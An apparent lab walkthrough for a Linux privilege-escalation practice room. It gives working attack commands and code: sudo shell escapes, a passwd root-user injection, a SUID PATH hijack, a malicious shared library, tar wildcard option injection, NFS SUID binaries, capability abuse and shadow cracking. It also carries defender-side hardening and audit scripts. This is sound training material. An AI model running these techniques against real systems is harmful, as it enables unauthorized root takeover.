Linux PrivEsc Arena

intermediate · 2h · Writeup

Multiple privilege escalation challenges

Learning Objectives

  • Complete all challenges
  • Use multiple techniques
  • Practice enumeration
  • Chain vulnerabilities

Linux PrivEsc Arena is a practice environment with multiple privilege escalation vectors to exploit. This walkthrough covers each technique on the box, helping you build muscle memory for real-world engagements.

This room is designed for practice: each vector is intentionally left exploitable. In real engagements you might only find one or two of them, so practise them all here so you recognize them in the wild!

Getting Started

bash
# SSH into the machine
ssh TCM@TARGET_IP
# Password: Hacker123

# Basic enumeration
id
uname -a
cat /etc/issue

# Run linpeas for a comprehensive scan
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Kernel Exploits

bash
# Check kernel version
uname -r
# Example: 3.13.0-24-generic

# Search for exploits
searchsploit linux kernel 3.13
# or use linux-exploit-suggester

# Download and compile exploit on target or attacker
gcc exploit.c -o exploit
chmod +x exploit
./exploit

# If successful: root shell

Kernel exploits can crash systems. In CTFs they're fine, but in real engagements, get explicit permission and have a recovery plan.

Stored Passwords

bash
# Check history files
cat ~/.bash_history
# Might contain: mysql -u root -p'password123'

# Check config files
cat /var/www/html/config.php
cat /var/www/html/wp-config.php

# Check for backup files
find / -name "*.bak" 2>/dev/null
find / -name "*.old" 2>/dev/null

# Check for readable shadow file
cat /etc/shadow
# If readable, crack with john:
unshadow /etc/passwd /etc/shadow > hashes.txt
john hashes.txt --wordlist=rockyou.txt

Weak File Permissions

bash
# Writable /etc/passwd
ls -la /etc/passwd
# If writable, add new root user:

# Generate password hash
openssl passwd -1 newpassword
# Output: $1$xyz$hashhere

# Add to /etc/passwd
echo 'newroot:$1$xyz$hashhere:0:0:root:/root:/bin/bash' >> /etc/passwd

# Login as new root
su newroot

# Writable /etc/shadow
ls -la /etc/shadow
# If writable, replace root hash:
# Generate: openssl passwd -6 newpassword
# Replace root's hash in /etc/shadow

SSH Keys

Check for writable ~/.ssh/authorized_keys. You can add your public key for persistent access!

Sudo Exploitation

bash
# Check sudo permissions
sudo -l

# === Example 1: vim ===
# (root) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'

# === Example 2: awk ===
# (root) NOPASSWD: /usr/bin/awk
sudo awk 'BEGIN {system("/bin/bash")}'

# === Example 3: nmap (old versions) ===
# (root) NOPASSWD: /usr/bin/nmap
sudo nmap --interactive
!sh

# === Example 4: find ===
# (root) NOPASSWD: /usr/bin/find
# The ';' that ends -exec must be escaped so the shell passes it to find
sudo find /etc -exec /bin/bash \; -quit

# === Example 5: env ===
# (root) NOPASSWD: /usr/bin/env
sudo env /bin/bash

# === Example 6: ftp ===
# (root) NOPASSWD: /usr/bin/ftp
sudo ftp
!/bin/bash

# === Example 7: less/more ===
# (root) NOPASSWD: /usr/bin/less
sudo less /etc/passwd
!/bin/bash

SUID Exploitation

bash
# Find SUID binaries
find / -perm -u=s -type f 2>/dev/null

# === Custom SUID binary (vulnerable.elf) ===
# Check what it does
strings /usr/local/bin/vulnerable.elf
ltrace /usr/local/bin/vulnerable.elf
# If it calls system("service apache2 start")
# without full path, exploit via PATH manipulation:

cd /tmp
echo '/bin/bash' > service
chmod +x service
export PATH=/tmp:$PATH
/usr/local/bin/vulnerable.elf
# Root shell!

# === Shared library injection ===
# If SUID binary loads library from writable location:
strace /usr/local/bin/suid-binary 2>&1 | grep open
# Look for: open("/home/user/lib.so", O_RDONLY) = -1

# Create malicious library
# (unistd.h declares setuid; without it newer gcc refuses to compile)
cat > /tmp/lib.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
static void inject() __attribute__((constructor));
void inject() {
    setuid(0);
    system("/bin/bash -p");
}
EOF
gcc -shared -fPIC -o /home/user/lib.so /tmp/lib.c
/usr/local/bin/suid-binary

Cron Job Exploitation

bash
# View cron jobs
cat /etc/crontab
# Example: * * * * * root /usr/local/bin/cron.sh

# Check permissions
ls -la /usr/local/bin/cron.sh
# If writable:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/cron.sh
# Wait for cron to run
/tmp/bash -p

# === Wildcard exploitation ===
# If cron: cd /home/user && tar czf /tmp/backup.tar.gz *

cd /home/user
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
touch -- --checkpoint=1
touch -- '--checkpoint-action=exec=sh shell.sh'
# Wait for cron
/tmp/bash -p
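The wildcard trick works because the shell, not tar, expands `*`, so tar receives file names that look like options. The backup function below is an added example for the defender's side of this section, not the room's cron script: it archives the same directory in a way that stores planted names as data. The names `safe_backup`, `archive_members` and `archive_has_member` are chosen here, and the option-looking file names in the demo are constructed.

```shell
#!/bin/bash
# Hardened replacement for a cron backup line of the form
#   cd /home/user && tar czf /tmp/backup.tar.gz *
# Added example; not the room's own script.

# Weak form, shown for comparison only and never executed here: the shell
# expands "*" and a file named "--checkpoint-action=exec=sh shell.sh" reaches
# tar as an option, so tar runs the script with cron's privileges.
#   tar czf "$archive" *

# Hardened form: "--" ends option parsing, so every later argument is a file
# name even when it begins with "-". The "./" prefix on the glob makes that
# true even for tar builds that handle "--" differently.
safe_backup() {  # $1 = directory to archive, $2 = output archive path
    local src=$1 archive=$2
    ( cd "$src" && tar -czf "$archive" -- ./* )
}

# Lists the member names stored in the archive, one per line.
archive_members() {  # $1 = archive path
    tar -tzf "$1"
}

# Succeeds when the archive holds the given member, which is how a reviewer
# confirms an option-looking name was archived rather than interpreted.
archive_has_member() {  # $1 = archive path, $2 = member name
    archive_members "$1" | grep -qxF -- "$2"
}

if [ "${1:-}" = "--demo" ]; then
    demo=$(mktemp -d)
    mkdir "$demo/home"
    : > "$demo/home/notes.txt"
    # constructed poisoned file names, as planted in the writeup above
    : > "$demo/home/--checkpoint=1"
    : > "$demo/home/--checkpoint-action=exec=sh shell.sh"
    safe_backup "$demo/home" "$demo/backup.tar.gz"
    archive_members "$demo/backup.tar.gz"
    rm -rf "$demo"
fi
```

Run it with `--demo` to see the three names listed as `./notes.txt`, `./--checkpoint=1` and `./--checkpoint-action=exec=sh shell.sh`. Two caveats: `./*` skips dot-files and expands to itself when the directory is empty, so a production script should use `find . -print0 | tar --null -T -` or enable `dotglob`/`nullglob` as needed.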

NFS Root Squashing

bash
# Check NFS exports
cat /etc/exports
# Example: /home/user *(rw,no_root_squash)

# On attacker machine:
showmount -e TARGET_IP
mkdir /tmp/nfs
mount -o rw,vers=2 TARGET_IP:/home/user /tmp/nfs

# Create SUID binary
# (stdlib.h and unistd.h declare system, setuid and setgid)
cat > /tmp/nfs/suid.c << 'EOF'
#include <stdlib.h>
#include <unistd.h>
int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash");
}
EOF
gcc /tmp/nfs/suid.c -o /tmp/nfs/suid
chmod +s /tmp/nfs/suid

# On target:
/home/user/suid
# Root shell!

Capabilities

bash
# Find binaries with capabilities
getcap -r / 2>/dev/null

# Example: /usr/bin/python2.7 = cap_setuid+ep
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Example: /usr/bin/tar = cap_dac_read_search+ep
# Can read any file!
tar -cvf shadow.tar /etc/shadow
tar -xvf shadow.tar
cat etc/shadow

PrivEsc Methodology

Systematic Approach

  1. Automated enumeration: run LinPEAS/LinEnum for a comprehensive scan
  2. Check sudo -l: often the quickest win
  3. Find SUID binaries: check against GTFOBins
  4. Check cron jobs: look for writable scripts or wildcard issues
  5. Search for passwords: history, configs, backups
  6. Check capabilities: getcap -r /
  7. Check NFS: cat /etc/exports for no_root_squash
  8. Kernel exploits: last resort - check version against exploit-db
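Read backwards, the checklist is a hardening audit. The script below is an added example, not part of the original writeup and not a tool from the room: it turns the findings from the Weak File Permissions, Sudo Exploitation, SUID Exploitation, Cron Job Exploitation, NFS Root Squashing and Capabilities sections into shell functions a defender can run before the box is ever attacked. Every function takes the file or directory to inspect as an argument, so it works on the live /etc files (invoke with `--run` as root) or on constructed copies. The function names, the `SHELL_ESCAPE_BINS` list, the `SUID_ALLOWLIST` variable and its one-path-per-line format are this example's own conventions.

```shell
#!/bin/bash
# Defender-side audit for the misconfigurations this room exercises.
# Added example; not the room's code. Each check reads the file or tree it is
# handed, so the same functions run against /etc on a host or against test copies.

# Weak File Permissions: accounts other than root carrying UID 0, which is what
# the "newroot" line appended to a writable /etc/passwd produces.
extra_uid0_accounts() {  # $1 = passwd-format file
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# /etc/passwd must not be writable by group or others; /etc/shadow must not be
# writable by its group or reachable by others at all (0640 root:shadow, the
# usual Debian layout, passes). Returns 1 when either rule is broken.
check_auth_file_modes() {  # $1 = passwd path, $2 = shadow path
    local bad=0
    if [ -n "$(find "$1" -maxdepth 0 -perm /022)" ]; then
        echo "passwd is group/world writable: $1"; bad=1
    fi
    if [ -n "$(find "$2" -maxdepth 0 -perm /027)" ]; then
        echo "shadow is group-writable or reachable by others: $2"; bad=1
    fi
    return "$bad"
}

# Sudo Exploitation: NOPASSWD rules on programs with shell escapes. The list
# holds the binaries the room uses; extend it from GTFOBins for your estate.
SHELL_ESCAPE_BINS='vim vi awk nmap find env ftp less more'
risky_nopasswd_rules() {  # $1 = sudoers-format file
    grep 'NOPASSWD' "$1" | while read -r rule; do
        for cmd in $SHELL_ESCAPE_BINS; do
            case "$rule" in
                *"/$cmd"|*"/$cmd "*|*"/$cmd,"*) echo "$rule"; break ;;
            esac
        done
    done
}

# SUID Exploitation: setuid files under a tree that are not on an allowlist
# (one absolute path per line) captured from a known-good build of the image.
unexpected_suid() {  # $1 = directory to scan, $2 = allowlist file
    find "$1" -type f -perm -4000 2>/dev/null | grep -vxF -f "$2"
}

# Cron Job Exploitation: system-crontab commands whose script is writable by
# group or others. System crontab fields: min hour dom mon dow user command.
writable_cron_targets() {  # $1 = crontab-format file
    awk '/^[^#]/ && NF >= 7 { print $7 }' "$1" | while read -r script; do
        [ -f "$script" ] || continue
        if [ -n "$(find "$script" -maxdepth 0 -perm /022)" ]; then
            echo "$script"
        fi
    done
}

# NFS Root Squashing: exports that switch root squashing off.
no_root_squash_exports() {  # $1 = exports-format file
    grep -v '^[[:space:]]*#' "$1" | grep 'no_root_squash' | awk '{ print $1 }'
}

# Capabilities: lines of "getcap -r /" output granting capabilities that are
# equivalent to root in practice.
dangerous_caps() {  # $1 = file holding getcap -r output
    grep -E 'cap_(setuid|setgid|dac_override|dac_read_search|sys_admin)' "$1"
}

# Runs every check against the live host; needs root to read shadow and sudoers.
# SUID_ALLOWLIST is this example's own variable (defaults to an empty list).
audit_host() {
    echo "== extra UID-0 accounts ==";  extra_uid0_accounts /etc/passwd
    echo "== auth file modes ==";       check_auth_file_modes /etc/passwd /etc/shadow
    echo "== risky NOPASSWD rules =="
    for f in /etc/sudoers /etc/sudoers.d/*; do
        [ -f "$f" ] && risky_nopasswd_rules "$f"
    done
    echo "== unexpected SUID files =="; unexpected_suid / "${SUID_ALLOWLIST:-/dev/null}"
    echo "== writable cron targets =="; writable_cron_targets /etc/crontab
    echo "== no_root_squash exports =="
    [ -f /etc/exports ] && no_root_squash_exports /etc/exports
    echo "== dangerous capabilities =="
    getcap -r / 2>/dev/null | dangerous_caps /dev/stdin
}

if [ "${1:-}" = "--run" ]; then
    audit_host
fi
```

Each function is silent when nothing is wrong, so the output of `--run` on a clean host is just the section headers; anything printed under a header is a finding worth the manual verification the takeaways below call for.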

Knowledge Check

In tar wildcard exploitation, what does --checkpoint-action do?

Key Takeaways

  • Practice multiple techniques to build recognition skills
  • GTFOBins is essential for sudo/SUID exploitation
  • Automated tools find issues; manual verification confirms exploitability
  • Real environments usually have fewer vectors - practice finding the one that works
  • Document your methodology for consistent results
  • Kernel exploits are powerful but risky - use as last resort